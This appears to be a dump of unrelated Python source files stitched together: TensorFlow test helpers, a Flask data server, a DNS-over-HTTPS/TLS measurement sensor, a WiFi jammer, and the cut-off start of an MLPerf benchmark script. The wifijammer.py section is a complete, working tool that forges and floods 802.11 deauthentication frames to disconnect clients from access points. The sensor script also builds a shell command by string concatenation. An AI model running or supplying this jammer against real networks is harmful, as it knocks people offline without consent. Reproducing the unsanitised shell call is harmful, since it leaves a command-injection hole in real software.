def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
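# Illustrative usage (a sketch, not part of the original file); "my_node" is a
# hypothetical node name:
#
#   graph_def = tf.compat.v1.get_default_graph().as_graph_def()
#   node = get_node_def_from_graph("my_node", graph_def)
#   if node is not None:
#     print(node.op, list(node.input))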
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
  assert graph.graph_def_versions.producer == producer_version
|
serve.py
|
import sys, json, threading, time, os
import flask
import config
app = flask.Flask(__name__)
port = int(sys.argv[1]) if len(sys.argv) == 2 else 80
class g:
daily_counts = []
def load_data():
while True:
with open(os.path.expanduser(config.config_dict['out_path'])) as f:
json_text = f.read()
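        # Assumption: the out_path file holds one JSON object per line, each line
        # ending in ",\n", so stripping the last two characters and wrapping the
        # text in brackets yields a valid JSON array.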
g.daily_counts = json.loads('[' + json_text[:-2] + ']')
time.sleep(60 * 60 * 24)
t = threading.Thread(target=load_data)
t.daemon = True
t.start()
@app.route('/')
def index():
return flask.render_template('index.html')
@app.route('/daily_counts')
def daily_counts():
    print('daily_counts:', g.daily_counts[0])
return flask.jsonify(g.daily_counts)
@app.route('/voronoi_test')
def voronoi_test():
return flask.render_template('voronoi_test.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=(port != 80))
|
sensor.py
|
import os
import requests
import dns.message
import dns.query
import dns.rdatatype
import random
from time import sleep
import peewee as pw
from datetime import datetime, timezone
import threading
import traceback
import json
global sec_working
sec_working = []
db = pw.SqliteDatabase('sensor.db', pragmas={
'journal_mode': 'wal',
'cache_size': -1024 * 64})
class BaseModel(pw.Model):
"""A base model that will use our MySQL database"""
class Meta:
database = db
class secdns_test(BaseModel):
date = pw.DateTimeField()
resolver = pw.CharField()
mode = pw.CharField()
result = pw.CharField()
sent = pw.CharField()
class test(BaseModel):
date = pw.DateTimeField()
host = pw.CharField()
sec_resolver = pw.CharField()
sec_resolved = pw.CharField()
norm_resolved = pw.CharField()
norm_google_resolved = pw.CharField()
sec_latency = pw.CharField()
norm_latency = pw.CharField()
sent = pw.CharField()
class sensor(BaseModel):
shash = pw.CharField()
def ip():
raw = requests.get("https://ipinfo.io")
raw = raw.json()
return (raw["ip"], raw["org"], raw['region'], raw['city'])
def ping(host):
response = os.popen("ping -c 5 " + host).read()
#print(response)
if 'time=' in response:
pingstatus = response.split("rtt min/avg/max/mdev = ")[1].split("/")[1]
else:
pingstatus = False
return pingstatus
def doh(host, provider="cloudflare"):
if provider == "cloudflare":
where = 'https://cloudflare-dns.com/dns-query'
elif provider == "google":
where = 'https://dns.google/dns-query'
elif provider == "quad9":
where = 'https://dns.quad9.net/dns-query'
    else: raise ValueError("unknown DoH provider: " + provider)
qname = host
with requests.sessions.Session() as session:
q = dns.message.make_query(qname, dns.rdatatype.A)
r = dns.query.https(q, where, session=session, timeout=10.0)
if len(r.answer) == 0:
            raise ValueError("empty DNS answer for " + host)
return r
def dot(host, provider="cloudflare"):
if provider == "cloudflare":
where = '1.1.1.1'
elif provider == "google":
where = '8.8.8.8'
elif provider == "quad9":
where = '9.9.9.9'
    else: raise ValueError("unknown DoT provider: " + provider)
qname = host
q = dns.message.make_query(qname, dns.rdatatype.A)
r = dns.query.tls(q, where, timeout=10.0)
if len(r.answer) == 0:
        raise ValueError("empty DNS answer for " + host)
return r
def normal_dns(host, provider="cloudflare", proto="udp"):
if provider == "cloudflare":
where = '1.1.1.1'
elif provider == "google":
where = '8.8.8.8'
elif provider == "quad9":
where = '9.9.9.9'
elif provider == "system":
where = '192.168.1.1'
    else: raise ValueError("unknown plain-DNS provider: " + provider)
qname = host
q = dns.message.make_query(qname, dns.rdatatype.A)
if proto == "udp":
r = dns.query.udp(q, where, timeout=10.0)
elif proto == "tcp":
r = dns.query.tcp(q, where, timeout=10.0)
if len(r.answer) == 0:
        raise ValueError("empty DNS answer for " + host)
return r
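# Illustrative usage of the resolver helpers above (a sketch, not part of the
# original file); each helper returns a dns.message.Message whose .answer holds
# the resolved records:
#
#   r = doh("example.com", provider="cloudflare")
#   r = dot("example.com", provider="quad9")
#   r = normal_dns("example.com", provider="google", proto="tcp")
#   print([str(rrset) for rrset in r.answer])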
def insert(result, mode):
if mode == "secdns_stat":
for r in result.keys():
secdns_test.create(
date = datetime.now(),
resolver = str(r).split('_')[0],
mode = str(r).split('_')[1],
result = str(result[str(r)]),
sent = '0'
)
elif mode == "test":
for r in result.keys():
test.create(
date = datetime.now(),
host = str(r),
sec_resolver = str(result[str(r)]['sec_resolver']),
sec_resolved = str(result[str(r)]['sec_dns']),
norm_resolved = str(result[str(r)]['norm_dns']),
norm_google_resolved = str(result[str(r)]['norm_google_dns']),
sec_latency = str(result[str(r)]['sec_latency']),
norm_latency = str(result[str(r)]['norm_latency']),
sent = '0'
)
    else: raise ValueError("unknown insert mode: " + mode)
def register():
server = "http://127.0.0.1:5000"
while True:
try:
ipp = ip()
shash = sensor.select()
            query = "?ip=" + ipp[0] + "&asn=" + ipp[1] + "&region=" + ipp[2] + "&city=" + ipp[3]
if len(shash) > 0:
shash = shash[0].shash
query += "&shash=" + shash
status = requests.get(server + "/api/v1/register" + query)
else:
status = requests.get(server + "/api/v1/register-new" + query)
sensor.create(shash=status.text)
except: traceback.print_exc()
sleep(random.uniform(3400,3800))
def report():
server = "http://127.0.0.1:5000"
while True:
sleep(random.uniform(300,500))
print("report")
try:
s = secdns_test.select().where(secdns_test.sent == '0')
if len(s) > 0:
pack = []
final = []
shash = sensor.select()[0].shash
for item in s:
obj = {}
obj['type'] = 'secdns'
obj['date'] = (item.date).timestamp()
obj['shash'] = shash
obj['resolver'] = item.resolver
obj['mode'] = item.mode
obj['result'] = item.result
final.append(obj)
pack.append(item.id)
status = requests.post(server + "/api/v1/submit", json=final)
if status.status_code == 201:
for i in pack:
secdns_test.update(sent='1').where(secdns_test.id == i).execute()
else:
raise "err"
s = test.select().where(test.sent == '0')
if len(s) > 0:
pack = []
final = []
shash = sensor.select()[0].shash
for item in s:
obj = {}
obj['type'] = 'host'
obj['date'] = (item.date).timestamp()
obj['shash'] = shash
obj['host'] = item.host
obj['sec_resolver'] = item.sec_resolver
obj['sec_resolved'] = item.sec_resolved
obj['norm_resolved'] = item.norm_resolved
obj['norm_google_resolved'] = item.norm_google_resolved
obj['sec_latency'] = item.sec_latency
obj['norm_latency'] = item.norm_latency
final.append(obj)
pack.append(item.id)
status = requests.post(server + "/api/v1/submit", json=final)
if status.status_code == 201:
for i in pack:
test.update(sent='1').where(test.id == i).execute()
else:
raise "err"
except: traceback.print_exc()
def do_dns(host, mode):
if mode == "cloudflare_doh":
return doh(host, 'cloudflare')
elif mode == "google_doh":
return doh(host, 'google')
elif mode == "quad9_doh":
return doh(host, 'quad9')
elif mode == "cloudflare_dot":
return dot(host, 'cloudflare')
elif mode == "google_dot":
return dot(host, 'google')
elif mode == "quad9_dot":
return dot(host, 'quad9')
    else: raise ValueError("unknown secure DNS mode: " + str(mode))
def get_secdns_stat():
global sec_working
while (True):
result = {}
temp_working = []
rand = [random.uniform(1,5) for i in range(6)]
try:
doh("google.com", 'cloudflare')
result['cloudflare_doh'] = True
temp_working.append("cloudflare_doh")
except:
result['cloudflare_doh'] = False
sleep(rand[0])
try:
doh("google.com", 'google')
result['google_doh'] = True
temp_working.append("google_doh")
except:
result['google_doh'] = False
sleep(rand[1])
try:
doh("google.com", 'quad9')
result['quad9_doh'] = True
temp_working.append("quad9_doh")
except:
result['quad9_doh'] = False
sleep(rand[2])
try:
dot("google.com", 'cloudflare')
result['cloudflare_dot'] = True
temp_working.append("cloudflare_dot")
except:
result['cloudflare_dot'] = False
sleep(rand[3])
try:
dot("google.com", 'google')
result['google_dot'] = True
temp_working.append("google_dot")
except:
result['google_dot'] = False
sleep(rand[4])
try:
dot("google.com", 'quad9')
result['quad9_dot'] = True
temp_working.append("quad9_dot")
except:
result['quad9_dot'] = False
sec_working = temp_working
insert(result, "secdns_stat")
sleep(random.uniform(3600,4000))
def host_test(hosts):
global sec_working
while (True):
#print(sec_working)
result = {}
random.shuffle(hosts)
if len(sec_working) == 0:
sec = False
else: sec = sec_working[0]
for host in hosts:
try:
sec_dns = do_dns(host, sec).answer
sec_dns = [str(x).split(' ')[-1] for x in sec_dns]
sec_dns = ",".join(sec_dns)
except:
traceback.print_exc()
sec_dns = False
#print(sec_dns)
sleep(random.uniform(0.5,1.5))
try:
norm_dns = normal_dns(host, 'system').answer
norm_dns = [str(x).split(' ')[-1] for x in norm_dns]
norm_dns = ",".join(norm_dns)
except:
traceback.print_exc()
norm_dns = False
sleep(random.uniform(0.5,1.5))
try:
norm_google_dns = normal_dns(host, 'google').answer
norm_google_dns = [str(x).split(' ')[-1] for x in norm_google_dns]
norm_google_dns = ",".join(norm_google_dns)
except:
traceback.print_exc()
norm_google_dns = False
sleep(random.uniform(0.5,1.5))
if sec_dns != False:
sec_latency = ping(sec_dns)
else: sec_latency = False
if norm_dns != False:
norm_latency = ping(norm_dns)
else: norm_latency = False
#traceroute
result[host] = {
'sec_resolver' : sec,
'sec_dns' : sec_dns,
'norm_dns' : norm_dns,
'norm_google_dns' : norm_google_dns,
'sec_latency' : sec_latency,
'norm_latency' : norm_latency
}
sleep(random.uniform(1,3))
insert(result, "test")
sleep(random.uniform(40,60))
def main():
"""print(ping("8.8.8.8"))
print(doh("google.com", 'cloudflare'))
print(doh("google.com", 'google'))
print(doh("google.com", 'quad9'))
print(dot("google.com", 'cloudflare'))
print(dot("google.com", 'google'))
print(dot("google.com", 'quad9'))
print(normal_dns("google.com", 'cloudflare', 'udp'))
print(normal_dns("google.com", 'google', 'udp'))
print(normal_dns("google.com", 'quad9', 'udp'))
print(normal_dns("google.com", 'system', 'udp'))
print(normal_dns("google.com", 'cloudflare', 'tcp'))
print(normal_dns("google.com", 'google', 'tcp'))
print(normal_dns("google.com", 'quad9', 'tcp'))"""
hosts = [
"google.com",
"instagram.com",
"digikala.com",
"twitch.tv",
"aparat.ir",
"wikipedia.com",
"whatsapp.com"
]
db.connect()
db.create_tables([secdns_test, test, sensor])
reg = threading.Thread(target=register, args=())
reg.start()
rep = threading.Thread(target=report, args=())
rep.start()
x = threading.Thread(target=get_secdns_stat, args=())
x.start()
sleep(90)
print("Startng main test thread")
y = threading.Thread(target=host_test, args=(hosts,))
y.start()
if __name__ == '__main__':
main()
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
import re
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
nargs='*',
default=[],
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
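    # 0x8927 is SIOCGIFHWADDR, the ioctl that returns the interface's hardware
    # (MAC) address; bytes 18:24 of the packed ifreq result are the six MAC octets.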
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
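    # Each hop below is equivalent to running, for the current channel n:
    #   iw dev <mon_iface> set channel <n>
    # with n cycling through 1..11 (or 1..13 when --world is given).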
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
            if len(line) > 2:  # iw dev shouldn't display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
    # Broadcast, all-zeros, IPv6 multicast (two prefixes), spanning tree, IPv4 multicast, and our own monitor MAC
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore += [addr.lower() for addr in skip]
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint.lower() not in [pkt.addr1, pkt.addr2]:
return
if args.skip:
if pkt.addr2 in args.skip:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
            # Control frames = 1, data frames = 2 (management frames are type 0)
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
args.skip = list(map(str.lower, args.skip))
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
main.py
|
"""
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import array
import collections
import json
import logging
import os
import sys
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1e9
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco-300":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [300, 300, 3]}),
"coco-300-pt":
(coco.Coco, dataset.pre_process_coco_pt_mobilenet, coco.PostProcessCocoPt(False,0.3),
{"image_size": [300, 300, 3]}),
"coco-1200":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCoco(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-onnx":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoOnnx(),
{"image_size": [1200, 1200, 3]}),
"coco-1200-pt":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoPt(True,0.05),
{"image_size": [1200, 1200, 3],"use_label_map": True}),
"coco-1200-tf":
(coco.Coco, dataset.pre_process_coco_resnet34, coco.PostProcessCocoTf(),
{"image_size": [1200, 1200, 3],"use_label_map": False}),
}
# pre-defined command line options to simplify things. They are used as defaults and can be
# overwritten from the command line
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"max-batchsize": 32,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
"model-name": "resnet50",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
